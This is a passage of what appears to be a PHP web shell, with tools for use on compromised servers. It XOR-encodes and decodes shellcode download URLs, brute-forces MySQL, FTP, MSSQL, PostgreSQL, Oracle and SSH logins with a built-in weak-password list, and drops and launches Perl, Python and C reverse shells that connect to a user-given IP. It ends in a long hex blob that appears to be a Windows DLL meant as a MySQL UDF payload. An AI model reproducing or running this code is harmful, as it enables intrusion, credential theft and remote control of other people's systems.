    for ($i = 0; $i < 256; $i++) {
        $shellcode[0] = shellcode_decode($Url_String, dechex($i));
        if (strpos($shellcode[0], 'tp:') || strpos($shellcode[0], 'url') || strpos($shellcode[0], 'exe')) {
            $shellcode[1] = dechex($i);
            return $shellcode;
        }
    }
}
function Shellcode_j()
{
    $Oday_value = '0';
    $Shell_Code = 'http://blog.taskkill.net/mm.exe';
    $checkeda = ' checked';
    $checkedb = '';
    if (!empty($_POST['code'])) {
        if ($_POST['xor'] == 'a' && isset($_POST['number'])) {
            $Oday_value = $_POST['number'];
            $Shell_Code = shellcode_encode($_POST['code'], $Oday_value);
        }
        if ($_POST['xor'] == 'b') {
            $checkeda = '';
            $checkedb = ' checked';
            $Shell_Code_Array = shellcode_findxor($_POST['code']);
            $Shell_Code = $Shell_Code_Array[0];
            $Oday_value = $Shell_Code_Array[1];
        }
        if (!$Oday_value) {
            $Oday_value = '0';
        }
        if (!$Shell_Code) {
            $Shell_Code = 'could not find the shellcode download url';
        }
        $Shell_Code = htmlspecialchars($Shell_Code);
    }
    print <<<END
<form method="POST" name="jform" id="jform" action="?s=j">
<div class="actall">XOR Value:<input name="number" value="{$Oday_value}" type="text" style="width:50px">&nbsp;&nbsp;&nbsp;
<input type="radio" name="xor" value="a"{$checkeda}>encode shellcode with XOR <input type="radio" name="xor" value="b"{$checkedb}>decode shellcode with XOR</div>
<div class="actall"><textarea name="code" rows="20" cols="165">{$Shell_Code}</textarea></div>
<div class="actall"><input class="bt" type="submit" value="Convert"></div>
</form>
END;
    return true;
}
//weak scan
function Crack_k()
{
    $MSG_BOX = 'waiting for message queue......';
    $ROOT_DIR = File_Mode();
    $SORTS = explode('/', $ROOT_DIR);
    array_shift($SORTS);
    $PASS = join(',', $SORTS);
    for ($i = 0; $i < 10; $i++) {
        $n = (string) $i;
        $PASS .= $n . $n . $n . $n . $n . $n . ',';
        $PASS .= $n . $n . $n . $n . $n . $n . $n . ',';
        $PASS .= $n . $n . $n . $n . $n . $n . $n . $n . ',';
    }
    if (!empty($_POST['address']) && !empty($_POST['user']) && !empty($_POST['pass'])) {
        $SORTPASS = explode(',', $_POST['pass']);
        $connect = false;
        $MSG_BOX = 'not found';
        for ($k = 0; $k < count($SORTPASS); $k++) {
            if ($_POST['class'] == 'mysql') {
                $connect = @mysql_connect($_POST['address'], $_POST['user'], chop($SORTPASS[$k]));
            }
            if ($_POST['class'] == 'ftp') {
                $Ftp_conn = @ftp_connect($_POST['address'], '21');
                $connect = @ftp_login($Ftp_conn, $_POST['user'], chop($SORTPASS[$k]));
            }
            if ($_POST['class'] == 'mssql') {
                $connect = @mssql_connect($_POST['address'], $_POST['user'], chop($SORTPASS[$k]));
            }
            // if($_POST['class'] == 'pgsql') $connect = @pg_connect("host=$_POST['address'] port=5432 dbname=postgres user=$_POST['user'] password=".chop($SORTPASS[$k]));
            if ($_POST['class'] == 'pgsql') {
                $connect = @pg_connect("host={$_POST['address']} port=5432 dbname=postgres user={$_POST['user']} password={chop({$SORTPASS[$k]})}");
            }
            //$connect = @oci_connect('system','oracle','"//localhost/orcl');
            if ($_POST['class'] == 'oracle') {
                $connect = @oci_connect($_POST['user'], chop($SORTPASS[$k]), $_POST['address']);
            }
            if ($_POST['class'] == 'ssh') {
                $ssh_conn = @ssh2_connect($_POST['address'], '22');
                $connect = @ssh2_auth_password($ssh_conn, $_POST['user'], chop($SORTPASS[$k]));
            }
            if ($connect) {
                $MSG_BOX = '[project: ' . $_POST['class'] . '] [ip: ' . $_POST['address'] . '] [user: ' . $_POST['user'] . '] [pass: ' . $SORTPASS[$k] . ']';
            }
        }
    }
    print <<<END
<form method="POST" name="kform" id="kform" action="?s=k">
<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
<div class="actall">Host <input type="text" name="address" value="localhost" style="width:300px"></div>
<div class="actall">User <input type="text" name="user" value="root" style="width:300px"></div>
<div class="actall">Pass <textarea name="pass" rows="20" cols="165">{$PASS}root,123456,123123,123321,admin,admin888,admin@admin,root@root,qwer123,5201314,iloveyou,fuckyou,kissme,520520,5845201314,a123456,a123456789</textarea></div>
<div class="actall">Crack Project: <input type="radio" name="class" value="mysql" checked>Mysql 
<input type="radio" name="class" value="ftp">FTP<input type="radio" name="class" value="mssql" checked>mssql<input type="radio" name="class" value="pgsql" checked>Pgsql<input type="radio" name="class" value="oracle" checked>Oracle<input type="radio" name="class" value="ssh" checked>SSH</div>
<div class="actall"><input class="bt" type="submit" value="Begin"></div></form>
END;
    return true;
}
//back connect
function Linux_l()
{
    echo "<br><br>";
    print "<div class=\"actall\" style=\"height:100px;\"><form method=\"POST\" name=\"lform\" id=\"lform\" action=\"?s=l\">\nYour IP: <input type=\"text\" name=\"yourip\" value=\"\" style=\"width:200px\">\nYour Port: <input type=\"text\" name=\"yourport\" value=\"1120\" style=\"width:100px\">\nScript Used: <select name=\"use\" >\n<option value=\"perl\">perl</option>\n<option value=\"python\">python</option>\n<option value=\"c\">c</option>\n</select>\n<input class=\"bt\" type=\"submit\" value=\"Connect\"></form><br>";
    if (!empty($_POST['yourip']) && !empty($_POST['yourport'])) {
        if ($_POST['use'] == 'perl') {
            $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
            echo File_Write('/tmp/b4che10r_pl', "#!/usr/bin/perl\r\nuse Socket;\r\n\$cmd= \"lynx\";\r\n\$system= 'echo \"`uname -a`\";echo \"`id`\";/bin/sh';\r\n\$0=\$cmd;\r\n\$target=\$ARGV[0];\r\n\$port=\$ARGV[1];\r\n\$iaddr=inet_aton(\$target) || die(\"Error: \$!\\n\");\r\n\$paddr=sockaddr_in(\$port, \$iaddr) || die(\"Error: \$!\\n\");\r\n\$proto=getprotobyname('tcp');\r\nsocket(SOCKET, PF_INET, SOCK_STREAM, \$proto) || die(\"Error: \$!\\n\");\r\nconnect(SOCKET, \$paddr) || die(\"Error: \$!\\n\");\r\nopen(STDIN, \">&SOCKET\");\r\nopen(STDOUT, \">&SOCKET\");\r\nopen(STDERR, \">&SOCKET\");\r\nsystem(\$system);\r\nclose(STDIN);\r\nclose(STDOUT);\r\nclose(STDERR);", 'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_pl success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_pl faild</font><br>';
            $perlpath = Exec_Run('which perl');
            $perlpath = $perlpath ? chop($perlpath) : 'perl';
            echo Exec_Run($perlpath . ' /tmp/b4che10r_pl ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? '<font style=font:11pt color=ff0000>execute command faild</font>' : '<font style=font:11pt color=ff0000>execute command successfully</font>';
        }
        if ($_POST['use'] == 'python') {
            $back_connect_py = "IyAtKi0gY29kaW5nOnV0Zi04IC0qLQ0KIyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoiIiINCmJhY2sgY29ubmVjdCBweSB2ZXJzaW9uLG9ubHkgbGludXggaGF2ZSBwdHkgbW9kdWxlDQoiIiINCmltcG9ydCBzeXMsb3Msc29ja2V0LHB0eQ0Kc2hlbGwgPSAiL2Jpbi9zaCINCmRlZiB1c2FnZShuYW1lKToNCiAgICBwcmludCAncHl0aG9uIGNvbm5lY3QgYmFja2Rvb3InDQogICAgcHJpbnQgJ3VzYWdlOiAlcyA8aXBfYWRkcj4gPHBvcnQ+JyAlIG5hbWUNCg0KZGVmIG1haW4oKToNCiAgICBpZiBsZW4oc3lzLmFyZ3YpICE9MzoNCiAgICAgICAgdXNhZ2Uoc3lzLmFyZ3ZbMF0pDQogICAgICAgIHN5cy5leGl0KCkNCiAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KICAgIHRyeToNCiAgICAgICAgcy5jb25uZWN0KChzeXMuYXJndlsxXSxpbnQoc3lzLmFyZ3ZbMl0pKSkNCiAgICAgICAgcHJpbnQgJ2Nvbm5lY3Qgb2snDQogICAgZXhjZXB0Og0KICAgICAgICBwcmludCAnY29ubmVjdCBmYWlsZCcNCiAgICAgICAgc3lzLmV4aXQoKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwyKQ0KICAgIGdsb2JhbCBzaGVsbA0KICAgIG9zLnVuc2V0ZW52KCdISVNURklMRScpDQogICAgb3MudW5zZXRlbnYoJ0hJU1RGSUxFU0laRScpDQogICAgcHR5LnNwYXduKHNoZWxsKQ0KICAgIHMuY2xvc2UoKQ0KDQppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOg0KICAgIG1haW4oKQ==";
            echo File_Write('/tmp/b4che10r_py', "# -*- coding:utf-8 -*-\r\n#!/usr/bin/env python\r\n\"\"\"\r\nback connect py version,only linux have pty module\r\n\"\"\"\r\nimport sys,os,socket,pty\r\nshell = \"/bin/sh\"\r\ndef usage(name):\r\n    print 'python connect backdoor'\r\n    print 'usage: %s <ip_addr> <port>' % name\r\n\r\ndef main():\r\n    if len(sys.argv) !=3:\r\n        usage(sys.argv[0])\r\n        sys.exit()\r\n    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n    try:\r\n        s.connect((sys.argv[1],int(sys.argv[2])))\r\n        print 'connect ok'\r\n    except:\r\n        print 'connect faild'\r\n        sys.exit()\r\n    os.dup2(s.fileno(),0)\r\n    os.dup2(s.fileno(),1)\r\n    os.dup2(s.fileno(),2)\r\n    global shell\r\n    os.unsetenv('HISTFILE')\r\n    os.unsetenv('HISTFILESIZE')\r\n    pty.spawn(shell)\r\n    s.close()\r\n\r\nif __name__ == '__main__':\r\n    main()", 'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_py success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_py faild</font><br>';
            $pypath = Exec_Run('which python');
            $pypath = $pypath ? chop($pypath) : 'python';
            echo Exec_Run($pypath . ' /tmp/b4che10r_py ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? '<font style=font:11pt color=ff0000>execute command faild</font>' : '<font style=font:11pt color=ff0000>execute command successfully</font>';
        }
        if ($_POST['use'] == 'c') {
            $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
            echo File_Write('/tmp/b4che10r_bc.c', "#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\nint main(int argc, char *argv[])\r\n{\r\n int fd;\r\n struct sockaddr_in sin;\r\n char rms[21]=\"rm -f \"; \r\n daemon(1,0);\r\n sin.sin_family = AF_INET;\r\n sin.sin_port = htons(atoi(argv[2]));\r\n sin.sin_addr.s_addr = inet_addr(argv[1]); \r\n bzero(argv[1],strlen(argv[1])+1+strlen(argv[2])); \r\n fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ; \r\n if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {\r\n   perror(\"[-] connect()\");\r\n   exit(0);\r\n }\r\n strcat(rms, argv[0]);\r\n system(rms);  \r\n dup2(fd, 0);\r\n dup2(fd, 1);\r\n dup2(fd, 2);\r\n execl(\"/bin/sh\",\"sh -i\", NULL);\r\n close(fd); \r\n}", 'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_bc.c success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_bc.c faild</font><br>';
            $res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
            @unlink('/tmp/b4che10r_bc.c');
            echo Exec_Run('/tmp/b4che10r_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? '<font style=font:11pt color=ff0000>execute command successfully</font>' : '<font style=font:11pt color=ff0000>execute command faild</font>';
        }
        echo '<br>local machine need run (nc -vv -l -p ' . $_POST['yourport'] . ')';
    }
    echo "</div>";
    return true;
}
//mysql udf
function get_code()
{
    return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000009BBB9A02DFDAF451DFDAF451DFDAF451A4C6F851DDDAF4515CC6FA51CBDAF45137C5FE518BDAF451DFDAF451DCDAF451BDC5E751DADAF451DFDAF55184DAF45137C5FF51DCDAF45137C5F051DEDAF45152696368DFDAF4510000000000000000504500004C010300B2976A460000000000000000E0000E210B01060000500000001000000090000010E6000000A0000000F000000000001000100000000200000400000000000000040000000000000000000100001000000000000002000000000010000010000000001000001000000000000010000000D8F000007400000000F00000D80000000000000000000000000000000000000000000000000000004CF100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000900000001000000000000000040000000000000000000000000000800000E055505831000000000050000000A000000048000000040000000000000000000000000000400000E055505832000000000010000000F0000000020000004C0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000322E303200555058210D09020A459475C59FCC587632C900000F46000000B00000260A00BC6FEDDDFF558BEC6AFF6800007148040ED064A10507506489FFD8FF9F2583EC0C5356578965E8C745FC0F7D0C0175236A00FFEDB77B012E05B008FF150970008945E4EB09B81E7363BB0124C38B2FFF000F8B4DF05FF6FFD94E0D5F5E5B8BE55DC20C0090008B442499ACFDF604C740081C100432C0C30F8F58FDAC7D0081EC8C090592C685E8FBFF77DFBD6100B9FF1733C08DBDE90DF3AB66ABAA33DB895DFC8B33DBBBFF450C8338010F85770380480439190A6C53EFFEFFBF80988B50088B0250E80A005DDC83C40885C00F84511A889DC8F6F720276B414EC9F6C785BC0A9FD9DC5D0C16899DC0090FC4D853A1FBF6DF8D8D1A518D95CCFA06528D85B80D500EB399661B2C256C44246CCDF7EFB116288B852A8985ACF605A866EEEE8C6C559C985668050134776723CD95C852240CBFBA8883C9DFDCFFB7FF9CF2AEF7D12BF98BF78BFA8BD1100E4F8BCAC1B3CDFDF6E902F3A50683E103F3A4FBF2083566B604D88B393284B4C1B5DB60E6D8FBB153006A0103FF6B63838A538B20B4283BC3752D6A0A6D84436EF0E8FB1C4F473ADBAF3D7C12516670380B52E917059E0B67B30CF72A18B9D0FA40FB0E72106AD1FA6803FA8D1D93CBD8D84268FF14D0FAC47E0990583A548D64D9BA6F3EE5117E8BF089B564B9535EC803C2993B046AA18BB810CD2ED81B0E567420C63C10FFB9E53B72C6000163E8EBBA1882FBB7B9850436D41105B0596A206A03049D306B6E037D7EB2BF0CF6B171F37B6883FEFF6A85385618DCEFEF2D94F889BD408D4764A80FF652F1DC2F942DB9590C89036A9D5679F8CFBE564F01515030108B13C6043A0009446C03E40BD18B3BD9687E2C089318580C04EB366A64B66C8DC972D031745813594ECE0E53C16551C83BE920FDC91E498B5514890AE98B03E63F61EE23C368C80B6389500C3BD37C2939D8751A3233C07F3001BB709155357A0C83910DBB954511420C8651C8D391AC91AE8D513763F24C9552CDB0069B6CC2A4E96551C51C8B6C76695D530C1FA86CB243C27B0C298B5BA5C3A71B4F08A40F8B400C8674DD5B768C07BC91591B00130BC8AEF1B72C1D750683C8FFC2C30E05DCC030D74E060C74092FF202EDB4329054554468020217F6FEBFFE7134F7D81BC04081C41A5E903D814C060F6808B8640426B073A466121C866DCBB6417B885DA87401A902ADB17EE3D2B76603B58845B71684FEF1888590FFFE7D72BB06563F84BD910AE983CF3F4F9B2E347D942C6A02227175943B5A018CEDF7751616FC1708EC3F79044888FEFE71103BC7751D560A1BC60B6C14326A107A8D74235F61B8E73A52180F66DB8D2C2C88980B531CAE9A338FCA02DD827A1D0E203DB8C9B537DC9004B9827E8B3089CAB4D6D37CB01D80B471D337110CE748BEDDEC6F6A081AA8D177E6489E04A0B6138D55A8E327325A00438D7DA883CE2D656B0763CE457537E59B512FD8B7C1028B8B8596504522D9BE1B6144418D4DA885C977DD1696139C2E06249C238D472834160750D28954283B70800CF2C67526537547C84B6CC025CF070D048CFFFEDF5EBC8549E4200866E4516A28AE11DB6E61BC52F88D2072229D489AB3985D2C1D8B35781C88D11B302A6C37DF5968311659FFFF1151BE82B96D42D6FC84FED51052D985CD06A5091CEBC5BA94506052022C069E0F3981C511788FA404FCF68450228B75087CC0807E09060A4B775B71A85F8B5E0C20D469D9D115CEF92011C8B80D124CB6177EA98AB6E00FC1E0028BC803C604C468141ADF02CC33C98A7DBFB566FBEF5E4CC1E102058D14018955E0803A4D4F586F8F818BB9AA01CC8BF2E266F3A7ED0CF26C164102C0159D0542D875477205B04C2C3908C10D00DA6E0D67EF1968D007001034E90B8795BC59C82DED1533F607B80774C03FFB9009C183C206298A023C2167DF7FE9743C843B1B3C0A741788843530421B46D889846744EBDB7FB907CABBFF6F29B6B53C33D2F3A6753B88954C0BB918D962C860784DB34C76739038C0B10B6C68E803C59378271EEB254A1D8E236534B0301BB135728144C60F4F9400D7493C77C7030B5E382E81D8BB7F1A837C2410027513060405750C5B6464046B5F23C357084F179213C888140525F1ECA263810C5456C9134CD8C9C22CBD4FE485DBCEE499566BF6CFE0FA8BCB2BCE490C0804904BB80768042700E0FE397221F724434558E0FE8108D87B96002F8BFB1B2A2327837CD98BFACBCB5073BCC8855098E0FE8D6FBFAC03B7B10DCC63DC0DAF234B21D18DC47AF02AFA7A568F638FA2C0EB0C0354AD46F2C505EED48821B01A60A081C4112684C3CFF4425689FF3B77D77857040CB911280D108D7C2418F3AB8D4C243B0D069B6C1451AB343101BA0B041B0111E5724E64F06650720D553D8755FD04BA917466380E6E8D542408D731F62D925266181108435C5C8F4F4A761850514F9481106A5CDFBFEACC4044076C1589B424809674C67652DD247C03788C5FB65E56B87B49BCBFF0FF255B3CCCCC8D87D4E1674755E7F0FF42DF86C00D5F613C5D6C7904F74104868B23B8065423740F795CEFDCD7B7A5108902B863C33E1210506AFE5C908E7F40F864FF35A900198E1AB52529582FDDD5B4BFC0ED742E3B932474FA34768B0CB38959BD2DB50A02C304B394751268F7DBBFEDBD2DB37D0EAAFF5408EBC3648F0543236C7286EA8C1A648B9C8184FF83DF7904687510E3520C3951087505CF4D05BBFB5351BB1E18EB0A082489DFDCB7B64B02439D6B0C595BFCEF56433230069F0BF758433030F7A5FAFCD82C10DBD10C74F740E42682B58DD63E3F45F812E11B8D08B67F97AD3E21737B08C1618D0C76B18FEA6EED5F744556558D6B10A80B5D5E410B33BBE85ED633783C25534F0DD41D2B38D3AF560C0E168D36B7DEDDB6C5648F358F550C3B08C77EBF73301A8B348FEBA1B8DBEB1CC9EB15884DD67A5C003F5D16466F684394BC3B8B298B419FCC256BB4031824E1D763D9B66E20CF56BDE8C0E010E24785ED75EC423C0AE0DD5B0D1A7E4DE47F34168D5AFF3ADD766B1B92784D1C8020770D2450EDC3FF4884157559598BC65EC9C3CF8DDCFAF7D7B26B71151008C3B7E0772212C7424B4F0434A759913916BDF01C6C7410131E97DEB2C3568BB5FB05D7383B42565777216A091C1FF8ECA245FBA424020C91EF2059E1DB46ED38CEC7FD85F675032863FCDA7F5E83C60F83E6F056887CA4BCC65CE23B3A6BFC4D5716F6460C4074ECEFB75D15660CB2174D29730510B35652F790357329C54E308374342411FAFEE42B502AF7FF761007176F9B34F5DD7D0525EB128B461C530B5FD2A4D87B1C0059644B2A20B25628752EE34A467A86B386F62C591AE1D81E2DFA85EFFD0A7C092CE61D90280DE157F8ED397D08470F94C0485BC31630077AC31A6E5DF1025B5756391803BA23977D6097CA146A401A0CB8CDDCF7039B4DB4DD40743DFD6E78405720AC597B741356C220D7843337E11962410B5957B4C5DA2E6018CC07835328D00CBC3010E326ABA73DB884FB1147D903CB8BFEEA5A8A4614B8F01759C93A47FF7704A94949608563EF1B385B5E5FC93A00513D7DBB8B3B1C279772148111222E2D10B5B73FF685011773EC2BC88BC40C8BE18B596EB4A32D685036C10C576D747A9BF8BAEB74D9C614F7C64D8B197507F8B77803AB756FEB21F646880747497425FF6BCFBA26291F75EB2D1D5183E303740DEE5EEF66201D2F4B75F38492C3F7C79ED9E0FD2874123AFD8A116A9B3BE93AEE6C182EFA2AD1DBC2F6C82E89FEC7D074AFBAA5DB2FB523FEC70603D083F0E8C28B4F78E1BFF5C604A900948174DE84D2742C84641EF7C26FB7B7B90F580C070875C639EB18818C34DDA3E272090E00046A2BC45A88533F550A3B6CF7EBEE075F75F8B07585A3CCFFEFDE8DC6974E8A11F161698A7101DDBF2B74644F7719148A074638D07415D90BD3D2A573E30A0A75F5FC5F51E242173E10F0078D7E436102FE3B2A50DD4E1DC60238E075C48A410376EDDDEF31188A66FF83C11074DFEBB12F348AC26B74851B9030F28DBC0CC34C05C7DB88DFFC83F8F988CC078FA7DBC668BEA3068E58BEB2427EBB8EDE3CA10E680D075925DEC12DBDD1F7FB12102760891664950803C1EDDB50F3375C32F7750940EE78769BDDD8EB7256641CA4C03968098DCC7BB3D96D345204371B366231A8FF0519627F7FBBC8EB3E6B3BC1752C390D0D7EBDFF07E6FB0AFC0D8E90E128E6320E175A89D8331A64FBC25507514EADD87E11B259BF5833A569A363097D56B457C7105EBDC0D6BB09833D482926C101740547D36EA3040322DAA4C4E809F4AED9996EFFD0080CC113CC04BCB6D410BF4E0F07EB8D01C90C4C6D6FB0BB1737575023F6467926A315ED8034032125F71F0117396C115B083C5BD8B9E241C0D01A8DD4D8B1AE6176BA310E97D801DB78C041E03A9A3A3AD3C57DCD2A7D3B8130AB756C462D6C36BE025E10A882D2F6A840B9EEDAB61BED074AA96604071017DE6EBFF77F3F4E0824FE890E89462F1883657524EF0337F72D6E66A90C0115F981FE8B03BFC75A289C0748750BC03F32AE6ABFFDD7073E3EEE5966F7270801577467420BDCB65FAC3E2BF88D48390E581849A489DEB99EF04E047E10053CFE53DCEB3683FBF6CBFFDFBA198BCB8BC3C1F90583E01F8B0C8D93808D04C002B6F4B2D08196B88498F6F320F399B156A107783A260A4B2CD15C8A9E88E614B7C0C24A0D74885507DF40A12932DF4E0C20EB0FCC16B8760C7CEB080DC2C1C8A50E864C17064802DFBA95A1E6798A1F09DB8975F411BAD06E02EC890F0EF406D1B705D74A8D370641D00939554ABF7DF7EC0F8CDC1780FB207C1304787F0E0FBE50152EC08631717461EB02F8BE2DBCBB0F84C60E94C1F804A70789D00F879A85F652EC30FF24901DB2834803CBB22CDB55CC02D8E0E4FCDCBC6DBB4D5D1D954883E8E43B0403742DC1B55EA20B1F4848840DA8D2C56E6E594039FC082708041CB28C1D0111808002C3128E9EFB2AF9B9509B687613661E6CC80F8D12469B89985B8ED80E27B476CBB2ED170A666C4441D0EBE98AF03EED5C2E641EF0D305BF30E7CE63398D0489361B346FCBDB56AE2E046874206CB880FB7790495E2EA005804DFD10EEC6FFE4203F367514807F0134CA4747271FDA628680771888D0AA8568B7C6ED0D1C0FB6C3F66601802291EC50147E06131E28981DCEB0C18DCC35EB4733181652F39BE127F8670F8F1CE508650F8D9600F9EF43DB5811EBA9847817E8430F849FB96D5D836D70036C100CB8E903AF74A146C6BE3008CCC08B25430BFDF0BD68BEFACAC54BC21921D0ADAED4DEFB894DF844E7B1C92D0E2DE47EB981381229DC7477B37D212AD64E85D220D466833878869FED5DCA094040EBE721CC80C320136B1B74AB408FB8FDF3CAD14DDB955F708DCFF3F006CB1A0D8DAFF1660377862E8848BF578089043A953F5B008DD1D6C5F490323FD80C298EDDBEBDD35A7432040974C5487CE801521C97B3B345FE3A6C59882AF4471A183147BD2002BB8916359DDE6F2CF64580D9CCB97F74170FBF00D1E8E369E652D7D8C3AD2DDC000CBF0E94AE6DB4BE6E81344D50C28D8314670B2D826B25D5165C50CCA2B5AFD483C05E08F05D4B053B6C377540FC0EBCC8D18B851FB082B8F7855082FCC9C6057EB581E69E741429F0003506BE67B324205C595D12AF788432611654562D750DD0C2BB653A29BDB9E06157A758888D8459A619694899ED2C1D0C059E0684B686FB2C805184FD331B23B1CF05F77491C9C15DD4273C602621F62BC1D1F847FD340BDB0582F6288038AF03ECF1D728176B2624FE853D6B2815CC074DBB7B10D410A6FEF65D8A13C645EA3004516377CF60DF678845EBEB4821083BC202EB35D6852E09971B209909669F08CD2DF0EC668909050706F514EB0E296A403C0A69BF1FD6A05FA53A7959EB413D74218519637405404A0C0FBB641B0CF6C099EB250BB7C8F220AFC0ECC908EBE0070E19B8F5C6DB741BE37F177C1AC073115883D2D6E2C30D9FF7DA698BFAC90B1FDEE0B50577DC83E700B27D09161B2D08FD1B2AFCAA3AC0B6FBC60BC77509E40060B733D6DEADD55E614A7F0619EE0F765B5DFDF4995250578AC009C476409C5FDB6E372AC48B66C33007C017112CCBF6DF063E39677E03035DD440F8F847D75CF78818EBB5502B0C027F02A51AEE9B03611880393075A90A009BBBEB24400FC601301A98D825DEFEB1B6F4935DFCF6C3D226F6C716CF5A8386068A2D5C0F0A2BEB47369A970902740B20C1E475E06035B6ED2B75E402F4180C7884BDDB61A91B201EF0C41011CD7C37B703EA1402E45015342C9001D94C3E3104306F6B97DA893E7441058B7EFBBB0B97688E3B78FFDD034347C8502DFC54A443DE9D7E328DE9516EA164CF3B1759984FDB962DD802C7155802F4F860A50AC977AC79A5D7193808FBF97DF729B3456313F9E86DEC99D334B75BE01830031706216D30D1354DA4ACE11B7440C6126F55424F490478DC11BA6D6C74898A02FF0EB6300BB90233E098006C4E9468254A90D68C71D8A3AE4A83B557AFA9E0B06AEA7E21B618B714AB63DB43B9833E0D07207FE3B5B628B5908B5CE81A4BE6775DD73831263C1C35100FBE065746CDE7EC505F363FC34BE26D6C3C72BE9F580081008DAE0673520C083B4163B3A177D951FC1C661D6F8DE0B474E8500F41CC5204B4702D700B30027114E0550798688478EAA3365283702294BC5DF20D50600F6E85C0750F6C60A1FBCF373E5333DB391D15B4282D5DC3431B267E44D8B8013D0E74FB768AED8D700C5540785BFF36FFD70810E0916D800A6AFF7604626BC75EEAD59C14433B487CCED915DB812D1BB81D785DF6568CFDDB41DC7078158184FFD6077415CA2083644457D42DB983867CBE100A06FE2B8F3C763BD13474230774741B647413A8AE012344D398367B845CC52BDCFF007CC45A2067C106D76A07845D1003CA44F85083EAC716DE3C856C6C3407753E576A181F3B1A1F3C8BF8D4336A113542FB8D06BC59078C08005957750ADA0E78B31F78893EEB067A1D84D9607F865F281A805E5D60FF57605AA8B11584CC40A48B4F485801B7B87501172BC5D86E2508B00006B41217B770A0FBACC70505A48BBDA118AD96AFC18DB